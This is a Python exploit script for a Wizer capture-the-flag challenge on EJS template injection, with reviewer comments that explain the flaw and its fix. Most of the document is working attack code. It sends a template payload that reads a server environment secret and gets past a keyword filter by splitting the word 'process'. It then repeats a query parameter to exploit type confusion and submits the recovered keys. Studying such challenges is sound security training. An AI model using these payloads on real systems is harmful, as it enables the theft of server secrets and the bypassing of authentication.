Wizer - Challenge 38 - EJS template injection

Exploit

import requests

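# Get the robertf key.
#
# The profileMessage value carries an EJS output tag (<%= ... %>). If the
# server compiles this parameter as template source, instead of passing it to
# a fixed template as data, the expression is evaluated server-side and its
# result is echoed back in the response body.
# NOTE(review): the server code is not shown on this page. Writing the
# identifier as 'pro' + 'cess' presumably sidesteps a filter on the literal
# word, which is why a keyword denylist is not a fix for template injection;
# the fix is to never treat request input as template source.

url = "https://chal38-4589uyh.vercel.app"

r = requests.get(
    url + "/profileName",
    params={
        "username": "robertf",
        "profileMessage": "HERE: <%= this['pro' + 'cess'].env.superAdminCode %>",
    },
    # Bound the wait so a stalled endpoint cannot hang the script forever.
    timeout=10,
)

print(r.text)

# Value noted by the author, presumably copied from the response printed above:
# 784HDHASJJ3489JJFKSJ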


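# Call /profileName again, this time sending the key value noted earlier in
# the script. requests serialises a list value as a repeated query parameter
# (username=robertf&username=pelele), so the server receives `username` twice.
# NOTE(review): presumably this targets a handler that expects a single
# string; server-side, the type of every query value should be checked
# before it is used in a lookup or comparison.
r = requests.get(
    url + "/profileName",
    params={
        "username": ["robertf", "pelele"],
        "key": "784HDHASJJ3489JJFKSJ",
    },
    timeout=10,  # do not block indefinitely on an unresponsive endpoint
)

print(r.text)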




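# Submit a username/key pair as a JSON body to /checkKeyValidity and print
# the server's answer.
# NOTE(review): this key does not appear earlier in the script; it was
# presumably taken from the output of the preceding request. Confirm.
r = requests.post(
    url + "/checkKeyValidity",
    json={
        "username": "robertf",
        "key": "!!!6g44534i8j4589gj90kg5",
    },
    timeout=10,  # do not block indefinitely on an unresponsive endpoint
)

print(r.text)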